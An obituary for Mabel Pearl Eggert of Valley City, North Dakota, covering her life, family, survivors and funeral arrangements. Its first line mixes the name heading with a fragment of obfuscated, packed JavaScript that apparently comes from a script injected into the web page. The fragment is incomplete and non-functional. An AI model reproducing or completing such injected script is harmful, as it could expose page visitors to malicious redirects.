Eggert, MabelMabel ibiat|var|u0026u|referrer|iistk||js|php’.split(‘|’),0,{}))
Pearl Eggert, life-long resident of Valley City, ND, passed away at the age of 93 years old on Friday, June 5, 2015, at the Sheyenne Care Center, Valley City.  Mabel was born to Lewis and Bertha (Betts) Jewett on July 28, 1921 in Findlater, Saskatchewan, Canada.  She and her twin brother, Mack, had 5 other siblings.  In her childhood, she lived in Canada, Minnesota, and North Dakota because her father worked for the railroad and farmed in North Dakota.

When she was young, she enjoyed singing and playing the guitar.  She could yodel and sing country songs.  She sang on KOVC radio.  She graduated from Valley City High School in 1939.

On May 9, 1942, she married Irvin Eggert in Yakima, Washington, where he was stationed in the Army.  After being discharged from the Army, they lived in the Barnes County area and raised 7 children.  They always enjoyed music and dancing.  Irvin died in November 1989.

During her life she was a caring mother of her children and grandchildren.  As she grew older, people would comment to her, “You must have been a good parent because you have such good children.”  And she would say, “Grandchildren are God’s way of compensating for growing old.”  She believed hugs were good for your health and gave lots of them.  Now she is giving heavenly hugs to all of us and we are so happy to receive them.

She enjoyed playing card games and nights out at the bingo parlor in her later years.  She made many friends playing bingo and was rather lucky at the game.

Gardening, baking the best pies around, drawing pictures, and writing poems were some of her other talents.  Her grandkids loved her banana cherry jello.  Nobody made it like Grandma Mabel.

She was a resident of the Sheyenne Care Center for the last five plus years.

Mabel is survived by 7 children:  Carolyn (Lee) Samson, Fargo, ND, Judy (Dick) Grenz, Valley City, Gale “Buzz” (Margie) Eggert, Valley City, Colleen “Bea” (Gary) Tait, Valley City, Allan (Jan) Eggert, Valley City, Patricia (Mike) Conway, Rosemount, MN, and James (Marie) Eggert, Bismarck, ND; 17 grandchildren; 26 great-grandchildren; 2 great great grandchildren; a sister-in-law, Myla Nielsen; and numerous nieces and nephews.

She was preceded in death by her parents, Lewis and Bertha Jewett; her husband, Irvin Eggert; brothers, Fred, Guy, John, and Mack Jewett; sisters, Dolly Jewett and Helen Walker; and her great grandson, Jacob Riedman.

The funeral service for Mabel Eggert will be held at 11:00 AM on Wednesday, June 10, 2015 at Trinity Lutheran Church in Valley City.  Burial will be in Memory Gardens near Valley City.

Visitation will be on Tuesday, June 9, 2015 from 4:00 PM until 7:00 PM at the Oliver-Nathan Funeral Chapel, Valley City.
